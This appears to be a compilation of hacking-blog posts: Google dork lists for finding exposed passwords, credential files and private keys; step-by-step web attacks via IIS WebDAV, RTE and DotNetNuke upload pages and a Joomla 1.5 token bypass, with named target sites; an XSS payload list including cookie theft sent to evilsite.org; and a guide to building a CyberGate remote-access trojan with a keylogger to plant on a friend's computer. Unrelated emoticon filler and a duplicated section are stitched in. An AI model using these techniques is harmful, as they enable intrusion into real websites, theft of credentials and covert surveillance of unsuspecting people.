Password Search Queries using Google Dork !!!

"admin account info" filetype:log
! Host=*.* intext :enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl: (service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd "AutoCreate=TRUE password =*" "http://*:*@www" domainname
"index of/" "ws_ftp.ini" "parent directory" "liveice configuration file" ext:cfg -site: sourceforge.net
"parent directory" +proftpdpasswd
"powered by ducalendar" -site:duware.com "Powered by Duclassified" -site: duware.com
"Powered by Duclassified" -site:duware.com "DUware All Rights reserved"
"powered by duclassmate" - site:duware.com
"Powered by Dudirectory" -site:duware.com "powered by dudownload" -site: duware.com
"Powered By Elite Forum Version *.*"
"Powered by Link Department"
"sets mode: +k"
"your password is" filetype:log
" Powered by DUpaypal" -site: duware.com
allinurl: admin mdb auth_user_file.txt
config.php
eggdrop filetype:user user
enable password | secret "current configuration" -intext : the
etc (index.of)
ext:asa | ext:bak intext :uid intext :pwd -"uid..pwd" database | server | dsn
ext:inc "pwd=" "UID=" ext:ini eudora.ini
ext:ini Version=4.0.0.4 password ext:passwd -intext :the - sample -example
ext:txt inurl:unattend. txt
ext:yml database inurl:config filetype:bak createobject sa
filetype: bak inurl:"htaccess|passwd|shadow| htusers"
filetype:cfg mrtg "target[*]" - sample -cvs -example
filetype:cfm "cfapplication name" password filetype: conf oekakibbs
filetype:conf slapd.conf filetype:config config intext : appSettings "User ID"
filetype:dat "password .dat"
filetype:dat inurl:Sites. dat
filetype:dat wand.dat
filetype:inc dbconn
filetype:inc intext : mysql_connect
filetype:inc mysql_connect OR mysql_pconnect filetype:inf sysprep
filetype:ini inurl:"serv-u.ini"
filetype:ini inurl: flashFXP.ini
filetype:ini ServUDaemon filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log "See `ipsec --copyright"
filetype:log inurl:"password .log"
filetype:mdb inurl: users.mdb
filetype:mdb wwforum filetype:netrc password filetype:pass pass intext :userid
filetype:pem intext : private
filetype:properties inurl:db intext :password filetype:pwd service filetype:pwl pwl
filetype:reg reg +intext :"defaultusername" +intext
:"defaultpassword"
filetype:reg reg +intext :”WINVNC3”
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password )
filetype:sql ("values * MD5" | "values * password " | "values * encrypt";)
filetype:sql ("passwd values" | " password values" | "pass values" )
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password filetype:url +inurl:"ftp://" +inurl:";@"
filetypels username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext
:"enable password 7"
intext :"enable secret 5 {:content:}quot;
intext
:"powered by EZGuestbook"
intext
:"powered by Web Wiz Journal" intitle:"index of" intext :connect.inc intitle:"index of" intext :globals.inc intitle:"Index of" passwords modified intitle:"Index of" sc_serv.conf sc_serv content
intitle:"phpinfo()" +"mysql. default_password" +"Zend Scripting Language Engine"
intitle:dupics inurl: (add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle: index.of administrators.pwd
intitle: Index.of etc shadow
intitle:index.of intext :"secring.skr"|"secring. pgp"|"secring.bak"
intitle:rapidshare intext :login
inurl:"calendarscript/users. txt"
inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"
inurl:"GRC. DAT" intext :"password "
inurl:"Sites. dat"+"PASS="
inurl:"slapd.conf" intext
:"credentials" -manpage -"Manual Page" -man: -sample
inurl:"slapd.conf" intext :"rootpw" -manpage -"Manual Page" -man: -sample
inurl:"wvdial. conf" intext :"password "
inurl:/db/main. mdb
inurl:/wwwboard
inurl:/yabb/ Members/Admin.dat
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar. cfg
inurl:chap-secrets -cvs
inurl:config. php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd - man
inurl:nuke filetype:sql
inurl:ospfd. conf intext :password -sample -test - tutorial -download
inurl:pap-secrets - cvs
inurl:pass.dat
inurl:perform filetype: ini
inurl:perform.ini filetype:ini
inurl: secring ext:skr | ext:pgp | ext:bak
inurl: server.cfg rcon password inurl: ventrilo_srv.ini adminpassword
inurl: vtund.conf intext :pass -cvs
inurl:zebra. conf intext :password -sample -test - tutorial -download
LeapFTP intitle:"index.of./" sites.ini modified master.passwd
mysql history files NickServ registration passwords
passlist passlist.txt (a better way)
passwd passwd / etc (reliable)
people.lst psyBNC config files
pwd.db
server-dbs "intitle:index of"
signin filetype:url spwd.db / passwd
trillian.ini
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
[WFClient] Password = filetype:ica

How to Hack webisites using IIS Exploit !!!

Hello friends today  i am posting very easy technique of web hacking using IIS Exploit.

1) Go to Start ==> My Network Places ==> Add a Network Place

2) Click om Next ==> Choose Another network Location.

 3) Click on Next ==> Now type the Vulnerable Website address.

After that Click on next.

Click Next ==> Finish..
After that you can see it from My Network Places..

Here are some IIS Vulnerable Website..

http://disk.hzyhzhx.com
http://disk.hzyhzhx.com/
http://ayatolahkhamenae.parniansis.com/
http://bahadori1.parniansis.com/
http://beheshti.parniansis.com/
http://beheshti1.parniansis.com/
http://bentolhoda1.parniansis.com/
http://bitaraf.parniansis.com/
http://derakhshan.parniansis.com/
http://derakhshan1.parniansis.com/
http://derakhshan2.parniansis.com/
http://derakhshan3.parniansis.com/
http://ebnesina.parniansis.com/
http://emamali.parniansis.com/
http://emkhaleghiyeyzd.parniansis.com/

How to Hack webisites using IIS Exploit !!!

Hello friends today  i am posting very easy technique of web hacking using IIS Exploit.
1) Go to Start ==> My Network Places ==> Add a Network Place

2) Click om Next ==> Choose Another network Location.

 3) Click on Next ==> Now type the Vulnerable Website address.

After that Click on next.

 Click Next ==> Finish.
After  that you can see it in your my Network places... :-)

Here are Some IIS Vulnerable Website..

XSS CHEAT LIST !!!!

1. <IMG SRC=javascript:alert( String.fromCharCode(88,83,83))>
2. <script src=http://yoursite.com/your_files.js></script>
3. </title><script>alert(/xss/)</script>
4. </textarea><script>alert(/xss/)</script>
5. <IMG LOWSRC=\"javascript:alert('XSS')\">
6. <IMG DYNSRC=\"javascript:alert('XSS')\">
7. <font style='color:expression(alert(document.cookie))'>
8. <img src="javascript:alert('XSS')">
9. <script language="JavaScript">alert('XSS')</script>
10. [url=javascript:alert('XSS');]click me[/url]
11. <body onunload="javascript:alert('XSS');">
12. <script>alert(1);</script>
13. <script>alert('XSS');</script>
14. <script src="http://www.evilsite.org/cookiegrabber.php"></script>
15. <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
16. <scr<script>ipt>alert('XSS');</scr</script>ipt>
17. <script>alert(String.fromCharCode(88,83,83))</script>
18. <img src=foo.png onerror=alert(/xssed/) />   
19. <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>   
20. <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>   
21. <marquee><script>alert('XSS')</script></marquee>   
22. <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">   
23. <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">   
24. <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\
25. <body onLoad="alert('XSS');"   
26. [color=red' onmouseover="alert('xss')"]mouse over[/color] 
27. "/></a></><img src=1.gif onerror=alert(1)>    
28. window.alert("Bonjour !");   
29. <div style="x:expression((window.r==1)?'':eval('r=1;   
30. alert(String.fromCharCode(88,83,83));'))">   
31. <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>   
32. "><script alert(String.fromCharCode(88,83,83))</script>   
33. '>><marquee><h1>XSS</h1></marquee>   
34. '">><script>alert('XSS')</script>   
35. '">><marquee><h1>XSS</h1></marquee>   
36. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">   
37. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">   
38. <script>var var = 1; alert(var)</script>   
39. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>   
40. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>   
41. <IMG SRC='vbscript:msgbox(\"XSS\")'>   
42. " onfocus=alert(document.domain) "> <"   
43. <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>   
44. <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS   
45. perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out   
46. perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out   
47. <br size=\"&{alert('XSS')}\">   
48. <scrscriptipt>alert(1)</scrscriptipt>   
49. </br style=a:expression(alert())>   
50. </script><script>alert(1)</script> 
51. <SCRIPT>document.write("XSS");</SCRIPT>   
52. a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);   
53. ='><script>alert("xss")</script>
54. <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>   
55. <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>   
56. ">/XaDoS/><script>alert(document.cookie)</script>
57. <script>  src="http://www.site.com/XSS.js"></script>   
58. ">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>   
59. src="http://www.site.com/XSS.js"></script>         
60. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>   
61. [color=red width=expression(alert(123))][color]   
62. <BASE HREF="javascript:alert('XSS');//">   
63. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<   
64. "></iframe><script>alert(123)</script>   
65. <body onLoad="while(true) alert('XSS');">   
66. '"></title><script>alert(1111)</script>   
67. </textarea>'"><script>alert(document.cookie)</script>   
68. '""><script language="JavaScript"> alert('X \nS \nS');</script>   
69. </script></script><<<<script><>>>><<<script>alert(123)</script>      
70. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">   
71. '></select><script>alert(123)</script>   
72. '>"><script src = 'http://www.site.com/XSS.js'></script>   
73. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
74. <html><noalert><noscript>(123)</noscript><script>(123)</script>    

HACK WebSites using RTE Web Vulnerability !!!!!

Hello Friends ,
Here i am posting another method  to hack a website using RTE Vulnerability :-)

Dork: " inurl:RTE_popup_file_atch.asp"

Copy the Dork in the Google and you will get a link .
Eg: http://www.site.com/RTE_popup_file_atch.asp

 After that Click on Choose File ==> Upload.
Once your have uploaded your File you can see the File URL in the Right Hand Side ...Just copy the URL and paste it after website name...

I have one Website for you..
http://capcomputers.be/
http://capcomputers.be/RTE_popup_file_atch.asp

Enjoy ;-)

Chat with Friends through Command Prompt !!!!

All you need is your friend's IP Address and your Command Prompt.
 Open Notepad and write this code as it is.....!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

•  Now save this as "Messenger.Bat".

• Open Command Prompt.

• Drag this file (.bat file) over to Command Prompt and press Enter.

• Now, type the IP Address of the computer you want to contact and press enter

•  Now all you need to do is type your message and press Enter.

           Start Chatting.......:-)

Create Your Own Fake Warning Message Screen !!!!

Hello friends...
Making your own fake warning message screen... Now its very easy...
1. open notepad...
2.Just copy & paste it:

lol=msgbox("Warning computer has been infected by a virus ",20,"Virus Alert")..
3. save it as a extension .vbs

Your fake warning message box ready to use..
Try it & Enjoy...

U can change your message by editing "computer has been infected by a virus" & replace it with ur message which u want to show...

Hidden Facebook Smileys Emotions codes... Only 4 my Loving Frndzz...

Hidden Smileys and Emoticons:

Really happy emote: :D or :-D



Wink emote: ;) or ;-)

Happy eyes: ^_^

Laughing eyes: >:o

Cat smile: :3

Grumpy: >:-(

Sad: :( or :-(

Crying emoticon: :’(

Shocked emoticon: :o or :-o

Glasses emoticon: 8) or 8-)

Cool shades: 8-|

Rude: :p or :-p

WHAT?!: O.o

Dork emote: -_-

Duhhh emote: :/ or :\

Devil emote: 3:)

Angel emote: O:)

Kiss emote: :-* or :*

Love emote: <3

Pacman: :v

Robot: :|]

Putnam’s face: :putnam:


Penguin
<(")

How to Hack Joomla Using Token ByPass. !!!!

Today I will Show you how to Bypass Joomla token  and find user name. 

The vulnerability is reported in all 1.5.x versions prior to 1.5.6.

Dork:index.php?option=com_user&view=reset&layout=confirm 

Copy and paste this Dork in google and you will get the result.
For Eg:http://site.com/index.php?option=com_user&view=reset&layout=confirm

After getting this kind of page just put Qoute ( ' )  in the Submit button and then click on Submit.

After that you will get the option to reset the Password. :-)

Once you have reset the Passsword it will show you the login page .

Now you have to find the Username . :-) 

Now go to the URL and paste this dork 

index.php?option=com_fireboard&Itemid=71&func=userlist

 Eg: http://site.com/index.php?option=com_fireboard&Itemid=71&func=userlist

Here you will get the Username for login. :-)

Now you have get the Username and password for the login..Try It . :)

Yeppee...You have access the Administrator Panel..

Note:Special thanks to  Shriniwas.!!!

How to Hack your friends computer using Cybergate !!!

1) Download the Software Cybergate .

2)Install Cybergate.

3)After Installation it will ask you for the Password.

Default Password: cybergate

4)Once you have put the password, Click on Login.

You will get the message

CyberGate Station is now unlocked and fully functional.

5)After that Click on control Center ==>Start

   It will Ask you for the Port Number. You can assign any Port number from 0 to 65535.But remember don't assign well known Ports like 80,21 etc..

6) Once You have Assign the Port Number ,Go to Control Center ==>Builder==>Create Server 

After that Add the New User==>>Ok==>>Then Double Click on the User you have Add

7)Now Click on Add.

 After that you will need to add your IP Addresswith the Port number you have add before.

 Eg: 192.168.1.1:999
To get You IP address go to Run==>cmd==>>ipconfig 

8)Once you have Added the IP address and Port number go to Installation Tab .

Here you will get Different Option.

 =>Installation Directory :
Now Select any one option. where you want to infect your trojan in your Friends computer .
=>Boot:

Select Registry option also  .

Always Select the Random keys for Active Setup and Mutex.
=> Inject Into:

Mostly Select the Default Browser.
9)Now go to Message Tab:

You can display any message on your Friends computer , when he opens your File..

10)Now go to Keylogger Tab:

 It will give you all the Keystrokes of your Friends computer.

11)Now Directly Create Server: 

Click on Create Server and Save you File ..

After that just give this file to your Friend and when he click on that File you will get the access of his system.

You can download his files at your End.If the Person is having the Webcam you can access it..That's you are Having the Total Control of his System..
Note: You will maintain the Access till you have the same IP assign to your Computer..

DotNetNuke Remote File upload Vulnerability :-)

DotNetNuke - DNN Remote File Upload ;)

Dork : inurl:/tabid/36/language/en-US/Default.aspx

Copy this dork in google.
You will get website like

http ://site.com/tabid/36/language/en-US/Default.aspx

 After that  just replace the line with

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

For eg:  http ://site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

 You will see this type of link. After this just click on File option.

After getting this types of  link .Just copy this in your URL.

javascript:__doPostBack('ctlURL$cmdUpload','')

When you copy this Script in URL you will get browse option.

 Just upload your file here.
You  can access your file from http://site.com/portals/0/your filename